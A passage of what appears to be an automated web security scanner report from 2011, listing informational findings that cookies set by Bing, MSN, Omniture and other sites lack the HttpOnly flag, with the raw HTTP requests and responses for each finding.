Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 28182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

14.161. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:35:44 GMT
Connection: close
Set-Cookie: _SS=SID=BADDC820B268422C99FA89F5582D20C7; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4" height="0" width="0" frameborder="0"/>

14.162. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?FORM=MSMONY&mkt=en-US HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; _HOP=I=1&TS=1303843122

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US&FORM=MSMONY
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:38:43 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _HOP=I=2&TS=1303843123; domain=.bing.com; path=/
Content-Length: 164

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US%26FORM%3dMSMONY">here</a>.</h2>
</body></html>

14.163. http://www.bing.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/?FORM=MSMONY&mkt=en-US HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search?FORM=MSMONY&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:38:42 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1303843122; domain=.bing.com; path=/


14.164. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=7c08e1d9-6975-48a3-9c34-081b0ae79e10; expires=Tue, 26-Apr-2011 22:14:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vggqtwwd5coqz310h11pdmez; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

14.165. http://www.moxiesoft.com/tal_products/knowledgebase.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/knowledgebase.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:00:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=grdhfpr1wvmjhi45ytr3uh45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=unknown.direct_entry.04/26/2011; expires=Wed, 25-Apr-2012 21:00:25 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

14.166. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA35
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=40II8A39_0214:WP10_5|; domain=www.msn.com; expires=Fri, 29-Apr-2011 18:35:24 GMT; path=/
Set-Cookie: expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; domain=msn.com; expires=Tue, 10-May-2011 18:35:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 83624
Content-Length: 83624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

14.167. http://www.omniture.com/en/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271502|check#true#1303852368|session#1303852218540-851916#1303854162; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:29:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 26 Apr 2011 21:29:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:29:28 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:29:28 GMT; path=/; domain=omniture.com
Content-Length: 23337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Contact Omniture | Web Analytic
...[SNIP]...

14.168. http://www.omniture.com/en/products/conversion/testandtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/conversion/testandtarget

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/products/conversion/testandtarget HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; cms_site_lang=1; s_iid=1327; mbox=PC#1303601743323-887111.17#1306068395|session#1303649073183-321692#1303651055|check#true#1303649261

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 20:57:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 20:57:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 20:57:56 GMT
Connection: close
Set-Cookie: omniture_unique=2d1fce6a4fae5ab329674d745dd9d9a3; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 20:57:55 GMT; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
Content-Length: 36497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Website Optimization & Tracking
...[SNIP]...

14.169. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/closed_loop_marketing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/closed_loop_marketing HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271437|check#true#1303852297|session#1303852218540-851916#1303854097

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:12 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:12 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:12 GMT; path=/; domain=omniture.com
Content-Length: 25751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Closed Loop Marketing<
...[SNIP]...

14.170. http://www.omniture.com/en/products/marketing_integration/genesis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271435|check#true#1303852295|session#1303852218540-851916#1303854095

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:42 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:42 GMT; path=/; domain=omniture.com
Content-Length: 26117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Email Marketing Software | Sale
...[SNIP]...

14.171. http://www.omniture.com/en/products/marketing_integration/genesis/applications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271426|check#true#1303852295|session#1303852218540-851916#1303854086; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:17:53 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:17:53 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:17:53 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:17:53 GMT; path=/; domain=omniture.com
Content-Length: 32151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

14.172. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/15/444

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/15/444 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271496|check#true#1303852360|session#1303852218540-851916#1303854156; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:19:02 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:19:02 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:19:02 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:19:02 GMT; path=/; domain=omniture.com
Content-Length: 28521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

14.173. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/15/574

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/15/574 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271496|check#true#1303852356|session#1303852218540-851916#1303854156

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:46 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:46 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:46 GMT; path=/; domain=omniture.com
Content-Length: 28831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

14.174. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/39/543

Issue detail

